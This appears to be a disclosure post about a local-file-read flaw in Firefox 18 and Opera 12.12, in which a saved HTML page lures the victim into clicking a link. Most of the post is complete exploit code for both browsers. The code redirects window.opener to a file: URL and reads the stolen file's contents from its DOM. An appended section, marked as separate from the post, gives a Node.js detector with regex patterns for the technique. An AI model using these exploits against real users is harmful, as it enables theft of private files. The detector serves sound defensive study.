Russian researcher found a 0day vulnerability in Firefox 18 and Opera 12.12
An attacker can read an arbitrary file on the victim's host. The vulnerability does not depend on the OS type; it should work on Windows, Linux, etc.
The researcher described a social engineering way to use this vulnerability. The attacker gives the victim a link. The victim must save the evil HTML page to the local computer and then open the saved page in the victim's browser (Firefox or Opera).
Exploit for Opera:
<html>
<body>
<script>
if((navigator.userAgent.indexOf("Opera") != -1) && (window.location.protocol == "file:")) { //if browser Opera and protocol is "file"
  var file=prompt("Example: C:/file.txt "); //Select file to read
  if(file){
    console.log("File: "+file);
    document.write("<center>"+
      "<a href='data:text/html,"+ //create a link using "data" protocol
      "<script>"+
      "if(window.opener){"+ //only if "window.opener" is initialized
      "window.opener.location.replace(%22file://"+window.location.hostname+"/"+file+"%22);"+ //change the address of the parent tab on the path to read files
      "%3Cscript%3E"+ // bypass browser security using script tag
      "alert(window.opener.document.body.innerHTML);"+ //Let's see file content :)
      "%3C%2Fscript%3E"+
      "' target='_blank'>"+ //target= _blank
      "CLICK-CLICK</a>");
}}
</script>
</body>
</html>
The exploit for Firefox is a little more difficult to use (it must be saved in the root directory):
First file:
<html>
<body>
<script>
if((navigator.userAgent.indexOf("Firefox") != -1) && (window.location.protocol == "file:")){ //if browser Firefox and protocol is "file"
  document.write("<center>"+
    "<a href='./payload.html'"+ //call payload.html
    " target='_blank'>CLICK-CLICK</a>"); //target=_blank
};
</script>
</body>
</html>
Second file:
<html>
<body>
<script>
var file=prompt('Example: C:/file.txt');
console.log(file);
window.opener.location="file://localhost/"+file;
</script>
<script>
var al=function(){alert(window.opener.document.body.innerHTML)}; //Let's see file content
while(!window.opener.document.body){ //window.opener.document.body=null
  alert('Click OK'); //use alert for delay
  al();
};
</script>
</body>
</html>
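A defender-side sketch, added here and not part of the original post or the researcher's code: a Node.js triage function that flags saved HTML pages in which a child window navigates window.opener to a file: URL and then reads its DOM, the pattern both exploits above rely on. The indicator names, the "suspicious" rule and the sample strings are assumptions made for this example.

```javascript
// Added example: static triage of a saved HTML page for the opener-to-file: pattern.
// Indicator names and the "suspicious" rule are assumptions of this example.
const INDICATORS = [
  { name: "checks-file-protocol",
    re: /location\.protocol\s*={2,3}\s*["']file:["']/ },
  { name: "opener-navigated-to-file-url",
    re: /window\.opener\.location(?:\.(?:replace|assign)\s*\(|(?:\.href)?\s*=)[^;]*file:\/\// },
  { name: "reads-opener-dom",
    re: /window\.opener\.document\.body/ },
  { name: "data-url-link",
    re: /href\s*=\s*["']data:text\/html/i },
];

// Decode %XX escapes without throwing on malformed input, so script text
// hidden inside a data: URL is scanned as well.
function percentDecode(text) {
  return text.replace(/%([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

function triage(html) {
  const views = [html, percentDecode(html)];
  const hits = INDICATORS
    .filter(({ re }) => views.some((v) => re.test(v)))
    .map(({ name }) => name);
  // Core of the technique: the child window moves its opener to a file: URL
  // and then reads the opener's DOM.
  const suspicious = hits.includes("opener-navigated-to-file-url") &&
                     hits.includes("reads-opener-dom");
  return { hits, suspicious };
}

// Constructed sample: the script lines of the page's "Second file".
const SAMPLE_PAYLOAD = `<script>
var file=prompt('Example: C:/file.txt');
window.opener.location="file://localhost/"+file;
</script>
<script>
var al=function(){alert(window.opener.document.body.innerHTML)};
</script>`;

// Constructed sample: a benign page that also uses window.opener.
const SAMPLE_BENIGN = `<a href="https://example.org/" target="_blank">docs</a>
<script>if (window.opener) { window.opener.focus(); }</script>`;

console.log(triage(SAMPLE_PAYLOAD));
console.log(triage(SAMPLE_BENIGN));
```

A hit is a reason to inspect the file by hand, not a verdict: the patterns are textual and a page can build the same strings at run time.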